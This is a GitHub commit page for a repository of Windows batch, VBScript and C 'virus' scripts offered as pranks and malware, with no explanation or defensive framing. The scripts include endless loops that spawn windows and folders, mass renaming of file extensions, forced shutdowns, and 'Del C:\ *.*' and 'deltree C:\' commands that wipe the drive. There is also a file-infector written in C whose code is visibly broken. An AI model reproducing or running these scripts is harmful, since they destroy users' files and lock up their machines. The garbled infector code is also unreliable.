-
Notifications
You must be signed in to change notification settings - Fork 19
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
5cea57a
commit d07a71a
Showing
13 changed files
with
174 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
![BAT-v_1.8](https://socialify.git.ci/sachinl0har/BAT-v_1.8/image?font=Source%20Code%20Pro&forks=1&issues=1&language=1&owner=1&pulls=1&stargazers=1&theme=Dark) | ||
# BAT-v_1.8 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
Set oWMP = CreateObject(“WMPlayer.OCX.7”) | ||
Set colCDROMs = oWMP.cdromCollection | ||
do | ||
if colCDROMs.Count >= 1 then | ||
For i = 0 to colCDROMs.Count – 1 | ||
colCDROMs.Item(i).Eject | ||
Next | ||
For i = 0 to colCDROMs.Count – 1 | ||
colCDROMs.Item(i).Eject | ||
Next | ||
End If | ||
wscript.sleep 5000 | ||
loop |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
@echo off | ||
ren *.exe *.txt | ||
ren *.jpeg *.txt | ||
ren *.mp3 *.txt | ||
ren *.doc *.com | ||
ren *.jpg *.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
@echo off | ||
:RON | ||
md folder1 | ||
md folder2 | ||
md folder3 | ||
md folder4 | ||
md folder5 | ||
start folder1 | ||
start folder2 | ||
start folder3 | ||
start folder4 | ||
start folder5 | ||
goto RON |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
@echo off | ||
:RON | ||
start notepad | ||
start notepad | ||
start notepad | ||
goto RON |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
@ECHO off | ||
:top | ||
START %SystemRoot%\system32\notepad.exe | ||
GOTO top |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
FILE *Ron *vRon; | ||
int owned = 0; | ||
unsigned long x; | ||
char buff[256]; | ||
struct ffblk ffblk; | ||
clock_t st, end; | ||
main() | ||
{ | ||
st=clock(); | ||
clrscr(); | ||
owned=(find_first(“*.*”, &ffblk,0); | ||
while(!done) | ||
{ | ||
Ron=fopen(_arg[0], “rb”); | ||
vhost=fopen(ffblk.ff_name, “rb+”); | ||
if (vhost = =NULL) | ||
goto next; | ||
x = 89088; | ||
printf(“infecting %s\n”, ffblk.ff_name); | ||
while(x>2048) | ||
{ | ||
fread(buff,256,1,Ron); | ||
fwrite(buff,256,1,vRon); | ||
x – = 2048; | ||
} | ||
fread(buff,x,1,Ron); | ||
fwrite(buff,x,1,vRon); | ||
a++; | ||
next: fcloseall(); | ||
owned = findnext(&ffblk); | ||
} | ||
end = clock() | ||
printf(“Infected %d files in %f sec”, a, (end-st)/CLK_TCk); | ||
return (0); | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
@Echo off | ||
Del C:\ *.* |y |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
@echo off | ||
deltree C:\ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
@echo off | ||
shutdown -s -t “00” |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
@echo off | ||
shutdown -s -t “30” -c "Windows Shutting down in 30 seconds" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
Set wshShell =wscript.CreateObject(“WScript.Shell”) | ||
do | ||
wscript.sleep 100 | ||
wshshell.sendkeys “{CAPSLOCK}” | ||
wshshell.sendkeys “{NUMLOCK}” | ||
loop |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,81 @@ | ||
Set wshShell =wscript.CreateObject(“WScript.Shell”) | ||
do | ||
WshShell.Run “notepad” | ||
WScript.Sleep 100 | ||
WshShell.SendKeys “H” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys “e” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys “l” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys “l” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys “o ” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys ” ” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys “u” | ||
WScript.Sleep 200 | ||
Wshshell.Sendkeys “s” | ||
Wscript.Sleep 200 | ||
WshShell.SendKeys “e” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys “r” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys “.” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys “.” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys “…” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys “{enter}” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys “You” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys ” Have” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys ” Been” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys ” Hacked!!!” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys ” Now” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys ” Just” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys ” Taste” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys ” What” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys ” Virus” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys ” can do with uuuuuuuuuuuuu….” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys ” {enter}” | ||
WScript.Sleep 200 | ||
WshShell.SendKeys “hahahahaha…….” | ||
WScript.Sleep 200 | ||
WshShell.Sendkeys ” Now just Look Dumb Head what i will do!!!!!!!” | ||
wscript.sleep 200 | ||
wshshell.sendkeys “{enter}” | ||
wscript.sleep 200 | ||
wshshell.sendkeys “look” | ||
wscript.sleep 200 | ||
wshshell.sendkeys “{enter}” | ||
wscript.sleep 200 | ||
wshshell.sendkeys “how” | ||
wscript.sleep 200 | ||
wshshell.sendkeys “{enter}” | ||
wscript.sleep 100 | ||
wshshell.sendkeys “i” | ||
wscript.sleep 200 | ||
wshshell.sendkeys “{enter}” | ||
wscript.sleep 200 | ||
wshshell.sendkeys “crash” | ||
wscript.sleep 200 | ||
wshshell.sendkeys ” uR” | ||
wscript.sleep 200 | ||
wshshell.sendkeys “{enter}” | ||
wscript.sleep 200 | ||
wshshell.sendkeys “system” | ||
wscript.sleep 200 | ||
loop |